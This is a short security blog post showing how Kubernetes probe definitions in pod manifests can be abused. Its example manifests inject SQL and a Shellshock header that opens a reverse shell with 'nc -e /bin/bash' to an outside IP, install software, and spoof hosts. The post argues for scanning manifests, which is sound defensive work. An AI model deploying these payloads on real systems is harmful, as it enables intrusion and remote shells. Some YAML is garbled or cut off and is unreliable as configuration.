← Back to Blog

Exploiting applications using liveness probes in Kubernetes

Security implications of Kubernetes liveness, readiness and startup probes

📅 February 8, 2022 ✍️ Philippe Bogaerts ⏱️ 2 min read 📁 Security
Kubernetes Container Security

Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. kubelet uses these probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic and still alive. It is kubelet who actually executes the probes (and not the pod itself).

There are different ways the probes are executed:

  • httpGet
  • exec

The problems described here are considered 'as designed', as you should download containers from a trusted source according to the reviewers.

The examples below shows that trusted sources of container images will not solve the problem, neither will image scanning. To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))

Examples

Example 1: Overwriting files on the pod filesystem

This code snippet overwrites the pods /etc/hostfile to spoof hostnames:

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec15
spec:
containers:

  • name: liveness
    image: xxradar/hackon
    args:
    • /bin/sh
    • -c
    • touch /tmp/healthy;sleep 600
      livenessProbe:
      exec:
      command:

Example 2: Installing applications in a pod at deployment time

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec39
spec:
containers:

  • name: liveness
    image: ubuntu
    args:
    • /bin/sh
    • -c
    • touch /tmp/healthy;sleep 600
      readinessProbe:
      exec:
      command:
      • apt-get
      • update
        initialDelaySeconds: 5
        periodSeconds: 10
        timeoutSeconds: 60
        livenessProbe:
        exec:
        command:
      • apt-get
      • install
      • -y
      • curl
        initialDelaySeconds: 60
        periodSeconds: 100
        timeoutSeconds: 60
        EOF
        ```

Example 3: Attacking http(s) endpoints using SQL injection, XSS, ...

```yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness3
spec:
containers:

  • name: liveness
    image: ubuntu
    args:
    • /bin/sh
    • -c
    • touch /tmp/healthy;sleep 600
      livenessProbe:
      httpGet:
      host: www.xxxx.com
      path: /?'OR 1=1--
      port: 8080
      httpHeaders:
      • name: User-Agent
        value: xxxxxxxxx

EOF
```

Example 4: Attacking http(s) endpoints using shellshock

```yaml
apiVersion: v1
kind: Pod
metadata:
name: radarhack-pod3
labels:
pod: radarhack
spec:
containers:

  • name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    • containerPort: 80
      livenessProbe:
      httpGet:
      host: www.xxxxx.com
      path: /index.html?test=' or 1=1--
      port: 8080
      httpHeaders:
      • name: Custom-Header
        value: Awesome
      • name: X-Frame-Options
        value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
        initialDelaySeconds: 3
        periodSeconds: 3
        ```

Conclusion

Many things are written on securely deploying applications on Kubernetes. Keep in mind that all aspects need full attention and generating and building Kubernetes manifests is also developing code.